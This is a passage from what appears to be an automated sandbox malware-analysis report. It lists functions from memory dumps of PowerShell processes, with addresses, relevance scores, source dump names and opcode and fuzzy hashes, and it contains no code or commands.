                                                                  • Opcode Fuzzy Hash: 2b7a0cd7baf5420a3ba8eea77e88cd5401fff920ff53ae565ab26893f270d6bf
                                                                  • Instruction Fuzzy Hash: B0D14632A1FECE1FEB659BA858255B57BE1EF52310B0901FED45DCB0E3D928A905C341
                                                                  Function 00007FFD9B98664B Relevance: .3, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b0f0f8aab466771aaf18d8adbe260f3a08f5efb3074d93b7d18b8112623d976
                                                                  • Instruction ID: 4847d72f8f87c978778ddf561dad2848a5a065feacfefcf023f97e2ccd620f54
                                                                  • Opcode Fuzzy Hash: 7b0f0f8aab466771aaf18d8adbe260f3a08f5efb3074d93b7d18b8112623d976
                                                                  • Instruction Fuzzy Hash: B781FE22A2FECA2FEBB59BA854755386BD1EF11314B1A01BEC44DCF0E7D928AD058341
                                                                  Function 00007FFD9B8B9F7A Relevance: .2, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b41c22fa493e82129d8aade42d7c399fa09d160fc8944f471a4de19a4c02da6
                                                                  • Instruction ID: 61d5668e27930ebb09187e21558b0727673603fdab69aadee56b36c3efa74688
                                                                  • Opcode Fuzzy Hash: 5b41c22fa493e82129d8aade42d7c399fa09d160fc8944f471a4de19a4c02da6
                                                                  • Instruction Fuzzy Hash: A9515173E0A5AD5FEF119B6CACB54E53BA0EF1132CB0902B3D4988B0A3FD15261786C5
                                                                  Function 00007FFD9B8B9738 Relevance: .1, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a55989dc951cb66f7d4b5331e5bc4316f1f585661bcb52a97233c5982cc97ed7
                                                                  • Instruction ID: cea387578a5cf14e564f3852fa0de91f7155f671de3aad1876c790f5ce947a13
                                                                  • Opcode Fuzzy Hash: a55989dc951cb66f7d4b5331e5bc4316f1f585661bcb52a97233c5982cc97ed7
                                                                  • Instruction Fuzzy Hash: 99412B71A1DA8C8FDB589F5C985A6F87BE0FB99310F40416FE44C83292DA70B805CBC6
                                                                  Function 00007FFD9B79ED40 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2038989567.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b79d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f44720767ab505aa236a0acf5c330c336654f940d9ce7c28ec5ba2a570851bc
                                                                  • Instruction ID: e6d975a8f6997b546761304cf6a436f1843aee731375b271e509957353ed76f8
                                                                  • Opcode Fuzzy Hash: 8f44720767ab505aa236a0acf5c330c336654f940d9ce7c28ec5ba2a570851bc
                                                                  • Instruction Fuzzy Hash: 1041287040EBC44FE7568B289C51A523FF0EF53224B1A06DFD088CB1B3D629A84AC792
                                                                  Function 00007FFD9B8BA47C Relevance: .1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bfde10bf925b7128ccc304fd2e2c1ac5110e5c18b9e3c577b4a1900e24a67e9
                                                                  • Instruction ID: 759926aa424e0fef542d58676fa8c1a593e9a3166c08f9f7fe80d1d234363702
                                                                  • Opcode Fuzzy Hash: 2bfde10bf925b7128ccc304fd2e2c1ac5110e5c18b9e3c577b4a1900e24a67e9
                                                                  • Instruction Fuzzy Hash: 7221FB3190C74C8FDB59DBAC984A7E97FF0EB96321F04416BD048C7162DA74941ACB91
                                                                  Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                  • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                  • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9B98414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                                                  • Instruction ID: a6b9057d2c591850f379ea75c523750cbee07cc55d99c16724fd30a545dc3bd5
                                                                  • Opcode Fuzzy Hash: 880c924df4c57218b173242feb30aebd111f6bd87284b29f498435c9cb28245c
                                                                  • Instruction Fuzzy Hash: BBF0BE32B0E9098FD76AEA5CE4519A873E0EF6532071600BAE06DC72B3CA35EC40C741
                                                                  Function 00007FFD9B984400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                                                  • Instruction ID: 63d5de7804eeaba1e0dbdedc953e38d2050a6f7c98e83a431f02fcc399b2ec33
                                                                  • Opcode Fuzzy Hash: 3feedd1cf549ed9e603061348b8442df0d317f6c1cad636896c0e3bd50853a98
                                                                  • Instruction Fuzzy Hash: 67F0BE32A0E9498FD768EA6CE0609A873E0FF05324B1600BAE05DCB1A3CA25AC40C740
                                                                  Function 00007FFD9B9841D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: f848ec0fbad17b8826867ba541709e28433eada1e34e052a78df0744753283af
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: F1E01A31B1C8089FDAB9DA4CE051AA973E1EFA832171241BBD14EC7671CA32ED518B80

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B8B8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: K_^4$K_^7$K_^F$K_^J
                                                                  • API String ID: 0-377281160
                                                                  • Opcode ID: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                  • Instruction ID: c815e6c2b718b347b84d3f063be8ded7c21d719f69ad06d17291c854427b9ce5
                                                                  • Opcode Fuzzy Hash: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                  • Instruction Fuzzy Hash: 3421D4B77085269ED70A7B7DBC589E93BA0DB9827834542F3D1A9CB093E91460878AD0

                                                                  Executed Functions

                                                                  Function 00007FFD9B8A644D Relevance: .7, Instructions: 710COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53c01195f73f8a73227ad44aa0cc5b7f2546c736de7b4ea80fba15f23f60704c
                                                                  • Instruction ID: 27a89671e190e02e32b72c3865019132c701cad67d1a39a655afc8bd3774d6b8
                                                                  • Opcode Fuzzy Hash: 53c01195f73f8a73227ad44aa0cc5b7f2546c736de7b4ea80fba15f23f60704c
                                                                  • Instruction Fuzzy Hash: 47D19070A18A4D8FDF98DF58C455AA9BBE1FF68300F15416AD409D72AACB34E881CB81
                                                                  Function 00007FFD9B97664A Relevance: .4, Instructions: 409COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2241455034.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18522be2fbeefbbfabdd10f97dac79bc571f16f8f3278e26a2fd19f40a4b2f3
                                                                  • Instruction ID: 3945a73aaac0268fac655d9943c57f60721e544ca2745ae9a83ae0e46f91ace5
                                                                  • Opcode Fuzzy Hash: b18522be2fbeefbbfabdd10f97dac79bc571f16f8f3278e26a2fd19f40a4b2f3
                                                                  • Instruction Fuzzy Hash: 8EC14532B2FA8E1FEBA5EBA848A55B57BD1EF51354F0901FED05CC70E3DA18A9058341
                                                                  Function 00007FFD9B8AB71C Relevance: .3, Instructions: 281COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ae48e90fde6212427b9123be9fced1f4a9de0d8f440a4eda4961c6b5de687b7
                                                                  • Instruction ID: 925119dac308eada43f255a6dcf8acbcff20a0f23349ed96937bedb3b37aa6e6
                                                                  • Opcode Fuzzy Hash: 8ae48e90fde6212427b9123be9fced1f4a9de0d8f440a4eda4961c6b5de687b7
                                                                  • Instruction Fuzzy Hash: B981583061DB4D4FD759DF6CC895AB5BBE0EF99320F0401BED08AC71A3DA25A846CB91
                                                                  Function 00007FFD9B78EE24 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2236076356.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b78d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e72c4fc3e4badbe6d9862b6a746f6ceacce98db6877e2b43eb2af4266b40b4d6
                                                                  • Instruction ID: 5fff19aa4dcdc9ce2a00e7e47274a7c20540920639283c5a0cd7d29f5f20f444
                                                                  • Opcode Fuzzy Hash: e72c4fc3e4badbe6d9862b6a746f6ceacce98db6877e2b43eb2af4266b40b4d6
                                                                  • Instruction Fuzzy Hash: F241267140EBC85FE7569B3898559523FF0EF53321B1A06DFD088CB1B3D625A846C7A2
                                                                  Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                  Function 00007FFD9B8AA0FB Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2b543df41633ba7ba4609de63d9504b55fc7425156f85c4affd890c9d5670fa
                                                                  • Instruction ID: 73f6c04e07d552abe401d63e15cf2ecbc642ab894585a37a05f3181e80026287
                                                                  • Opcode Fuzzy Hash: d2b543df41633ba7ba4609de63d9504b55fc7425156f85c4affd890c9d5670fa
                                                                  • Instruction Fuzzy Hash: 05F04C36A09A8C5FD750EF1C98660E43FD0FF56201F0500BBE048C3072DA315508C7D2
                                                                  Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2241455034.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                  • Instruction ID: 18b8292df5f40ce1d4e493c7a9a1d7aba27ccfbc8c68daa4dd7325f40f191d54
                                                                  • Opcode Fuzzy Hash: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                  • Instruction Fuzzy Hash: D5F0BE32B1E5098FD769EA5CE4919A873E0EF6533071600BAE06DC76B3CA25EC40C745
                                                                  Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2241455034.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                  • Instruction ID: c30a2dd9a633f2258e4884fb375cde9c8abf22eb34bcf382bcaf6c9626cf1fcd
                                                                  • Opcode Fuzzy Hash: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                  • Instruction Fuzzy Hash: C9F0BE32A0E5498FD768EA5CE4A09A873E0FF0532072600FAE05DCB1B3CA25AC40C740
                                                                  Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2241455034.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B8A8BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^5$L_^@$L_^N$L_^U$L_^Y
                                                                  • API String ID: 0-3939689582
                                                                  • Opcode ID: 49ac951f850f032c92e7ea2465bfb15fba1fe588088f2042c55c3fccf1b44edf
                                                                  • Instruction ID: 3d3b048b3ffc58d16f2912e0b4202d97987b7ef03f1f8c33863fcdafa19208fd
                                                                  • Opcode Fuzzy Hash: 49ac951f850f032c92e7ea2465bfb15fba1fe588088f2042c55c3fccf1b44edf
                                                                  • Instruction Fuzzy Hash: F53157A7B085264AC31A3BBDB8565ED3740CF9437A34552F7C398CF0939E25608B8AE1
                                                                  Function 00007FFD9B8A89F2 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2238326529.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-205492149
                                                                  • Opcode ID: 907831168f2c073356fa434c07b86c775924fcb1c113b8e1e62dbb94e465deaf
                                                                  • Instruction ID: c63c66c8e428f78ea471f31137ad3a41b0c2d372dc38ccecd4855c517a74cce2
                                                                  • Opcode Fuzzy Hash: 907831168f2c073356fa434c07b86c775924fcb1c113b8e1e62dbb94e465deaf
                                                                  • Instruction Fuzzy Hash: CE31E6E3A0E9C70FE36A4B6D18660956F90EF6625834A13F6D1E88B0A3FD1439075672